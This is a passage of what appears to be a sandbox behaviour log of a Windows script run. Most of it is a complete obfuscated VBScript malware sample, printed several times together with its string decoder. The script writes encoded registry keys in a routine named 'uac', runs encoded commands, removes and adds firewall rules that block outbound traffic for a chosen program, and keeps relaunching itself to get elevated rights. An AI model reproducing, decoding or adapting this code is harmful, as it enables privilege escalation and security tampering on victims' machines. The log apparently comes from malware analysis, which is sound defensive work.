okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 4199 [0222.674] UnmapViewOfFile (lpBaseAddress=0x350000) returned 1 [0222.674] CloseHandle (hObject=0x104) returned 1 [0222.674] CloseHandle (hObject=0x100) returned 1 [0222.674] GetSystemDirectoryA (in: lpBuffer=0x2af1cf, uSize=0x0 | out: lpBuffer="") returned 0x14 [0222.674] GetSystemDirectoryA (in: lpBuffer=0x362e90, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0222.674] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76650000 [0222.674] GetProcAddress (hModule=0x76650000, lpProcName="SaferIdentifyLevel") returned 0x76672102 [0222.674] GetProcAddress (hModule=0x76650000, lpProcName="SaferComputeTokenFromLevel") returned 0x76673352 [0222.674] GetProcAddress (hModule=0x76650000, lpProcName="SaferCloseLevel") returned 0x76673825 [0222.674] IdentifyCodeAuthzLevelW () returned 0x1 [0222.879] GetVersionExA (in: lpVersionInformation=0x2ae878*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77252dd6, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2ae878*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.879] GetUserDefaultLCID () returned 0x409 [0222.880] IsFileSupportedName () returned 0x1 [0222.880] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0222.884] GetSignedDataMsg () returned 0x0 [0222.884] GetCurrentProcess () returned 0xffffffff [0222.884] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2aed9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2aed9c*=0x130) returned 1 [0222.884] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1067 [0222.885] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.885] ReadFile (in: hFile=0x130, lpBuffer=0x363688, nNumberOfBytesToRead=0x1067, lpNumberOfBytesRead=0x2aed70, lpOverlapped=0x0 | out: lpBuffer=0x363688*, lpNumberOfBytesRead=0x2aed70*=0x1067, lpOverlapped=0x0) returned 1 [0222.885] CoInitialize (pvReserved=0x0) returned 0x1 [0222.885] CoCreateInstance (in: rclsid=0x6db11e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6db11d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x2aed48 | out: ppv=0x2aed48*=0x2066e68) returned 0x0 [0222.912] __dllonexit () returned 0x6dae1815 [0222.912] __dllonexit () returned 0x6dae182f [0222.912] GetVersionExA (in: lpVersionInformation=0x2ad8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2ad8d0, dwMinorVersion=0x2, dwBuildNumber=0x2b0000, dwPlatformId=0x6dae4268, szCSDVersion="") | out: lpVersionInformation=0x2ad8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.912] GetProcessWindowStation () returned 0x2c [0222.912] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x2ad8d0, nLength=0xc, lpnLengthNeeded=0x2ad8dc | out: pvInfo=0x2ad8d0, lpnLengthNeeded=0x2ad8dc) returned 1 [0222.914] DllGetClassObject (in: rclsid=0xd7df0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x76adee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ae044 | out: ppv=0x2ae044*=0x362840) returned 0x0 [0222.914] IClassFactory:CreateInstance (in: This=0x362840, pUnkOuter=0x0, riid=0x2ae9f0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2ae030 | out: ppvObject=0x2ae030*=0x2066e68) returned 0x0 [0222.914] GetSystemInfo (in: lpSystemInfo=0x2adf70 | out: lpSystemInfo=0x2adf70*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0222.914] VirtualQuery (in: lpAddress=0x2adfb0, lpBuffer=0x2adf94, dwLength=0x1c | out: lpBuffer=0x2adf94*(BaseAddress=0x2ad000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0222.915] IUnknown:AddRef (This=0x2066e68) returned 0x2 [0222.915] IUnknown:Release (This=0x2066e68) returned 0x1 [0222.916] IUnknown:Release (This=0x362840) returned 0x0 [0222.916] IUnknown:QueryInterface (in: This=0x2066e68, riid=0x6db11d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2aed18 | out: ppvObject=0x2aed18*=0x2066e68) returned 0x0 [0222.916] IUnknown:Release (This=0x2066e68) returned 0x1 [0222.916] _strnicmp (_Str1=" 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _MaxCount=0x5) returned -1 [0222.916] IsTextUnicode (in: lpv=0x363688, iSize=4199, lpiResult=0x2aece0 | out: lpiResult=0x2aece0) returned 0 [0222.916] GetACP () returned 0x4e4 [0222.917] GetACP () returned 0x4e4 [0222.917] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x363688, cbMultiByte=4199, lpWideCharStr=0x3684a0, cchWideChar=4327 | out: lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 4199 [0222.918] CoUninitialize () [0222.918] CloseHandle (hObject=0x130) returned 1 [0222.918] wcsncmp (_String1="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 